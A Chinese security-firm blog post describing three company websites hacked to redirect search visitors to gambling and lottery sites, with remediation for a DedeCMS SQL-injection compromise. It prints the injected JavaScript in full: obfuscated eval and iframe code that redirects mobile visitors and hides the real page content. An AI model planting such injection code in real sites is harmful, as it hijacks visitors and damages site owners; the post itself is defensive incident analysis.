網站被黑提醒該站點可能受到******,部分頁面已被非法篡改

大清早的一上班收到3個網站客戶的QQ聯繫,說是自己公司的網站被跳轉到了北京sai車,cai票,du博網站上去了,我們SINE安全公司對3個網站進行了詳細的安全檢測,發現這3個客戶的網站都是同樣的症狀,網站首頁文件index.php,index.html都被篡改添加了惡意的代碼。網站在百度的快照也被更改成了這些cai票,bo彩的內容了,並被百度網址安全中心提醒您:該站點可能受到******,部分頁面已被非法篡改!如下圖所示:

網站被黑提醒該站點可能受到******,部分頁面已被非法篡改

從百度點擊網站進去,會直接跳轉到bo彩,du博網站上去,直接輸入3個公司的網站地址是不會跳轉的,點擊跳轉的時候會被360攔截掉,提示如下圖:

網站被黑提醒該站點可能受到******,部分頁面已被非法篡改
360安全中心提醒您:未經證實的bo彩du博網站,您訪問的網站含有未經證實的境外bo彩或非法du博的相關內容,可能給您造成財產損失,請您謹慎訪問。

我們SINE安全技術通過對3個客戶網站的代碼的安全分析,發現都被***者上傳了網站***後門,php大馬,以及一句話***後門都被上傳到了客戶網站的根目錄下,網站的首頁文件都被篡改了,包括網站的標題,描述,TDK都被改成了bo彩,cai票,du博的內容,客戶說之前還原了網站首頁文件,過不了多久還是被篡改,被跳轉,導致客戶網站在百度的權重直接降權,網站在百度的關鍵詞排名都掉沒了,損失慘重。網站被反覆篡改的原因根本是網站代碼存在漏洞,需要對網站漏洞進行修復,以及做好網站安全加固,清除***後門才能徹底的解決問題。

我們來看下網站首頁被篡改的症狀:
網站被黑提醒該站點可能受到******,部分頁面已被非法篡改

title keywords deion都被篡改了,內容都是加密的字符:

<title>&#65279&#x5317&#x4eac&#36187&#x8f66&#112&#107&#49&#x30&#32&#80&#x4b&#x31&#x30&#24320&#x5956&#x76f4&#25773&#x20&#21271&#20140&#x8d5b&#36710&#112&#x6b&#49&#x30&#24320&#22870&#x8bb0&#24405&#45&#112&#107&#x31&#x30&#x5f00&#22870&#35270&#39057&#30452&#25773</title>

通過url解密發現這些內容都是北京sai車,北京×××,×××北京PK開獎等cai票的網站關鍵詞,簡單來講就是網站的標題內容都被***者改成了cai票,bo彩的標題,利用網站自身在百度的權重,做他們自己的關鍵詞排名。

網站被跳轉的代碼也被我們SINE安全技術找了出來,如下:

function goPAGE() {if((navigator.userAgent.match(/(phone|pad|pod|iPhone|iPod|ios|iPad|Android|Mobile|BlackBerry|IEMobile|MQQBrowser|JUC|Fennec|wOSBrowser|BrowserNG|WebOS|Symbian|Windows Phone)/i))) { window.location.href = "rgyh2"} else {var ss = '<center id="yangchen"><ifr' + 'ame scrolling="no" marginheight=0 marginwidth=0 frameborder="0" width="100%" width="14' + '00" height="8' + '50" src="att=rgyh8"></iframe></center>'; eval("do" + "cu" + "ment.wr" + "ite('" + ss + "');"); try { setInterval(function() { try { document.getElementById("div" + "All").style.display = "no" + "ne" } catch (e) {} for (var i = 0; i < document.body.children.length; i++) { try { var tagname = document.body.children[i].tagName; var myid = document.body.children[i].id;if (myid != "iconDiv1" && myid != "yangchen") {document.body.children[i].style.display = "non" + "e" } } catch (e) {} } }, 100)} catch (e) {}}}goPAGE();

知道問題的所在,以及網站被***的症狀,那麼該如何解決問題?

首先登陸客戶網站的服務器,打包壓縮客戶的網站代碼下載到我們本地的工作電腦,對其進行詳細的安全檢測,以及網站漏洞檢測,網站***後門檢測,以及網站日誌下載分析,發現其中一個網站使用的是dedecms系統開發網站,網站存在sql注入漏洞,導致網站的管理員賬號密碼被sql注入獲取到,默認的管理員後臺地址dede沒有改,導致***者直接登錄後臺上傳了***到網站裏了。針對dedecms的sql注入漏洞進行了修復,清除掉網站存在的***後門,對網站安全進行加固問題得以解決。

對dedecms的目錄安全權限進行設置 /data目錄取消腳本執行權限,給與寫入權限,templets模板文件夾也是同樣的安全部署,取消php腳本的執行權限,開啓寫入權限,dede後臺的目錄給只讀權限,uploads上傳目錄給寫入,取消php腳本權限。

至此客戶網站首頁被篡改的問題得以解決,百度的攔截也是需要去除的,清除惡意鏈接代碼,修復網站漏洞,防止以後網站被篡改,做好網站安全後,再提交給百度安全中心人工審覈,就可以解除百度的攔截,如果您對網站漏洞修復不熟悉的話,可以找我們SINE安全來修復網站漏洞,解決百度攔截。

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章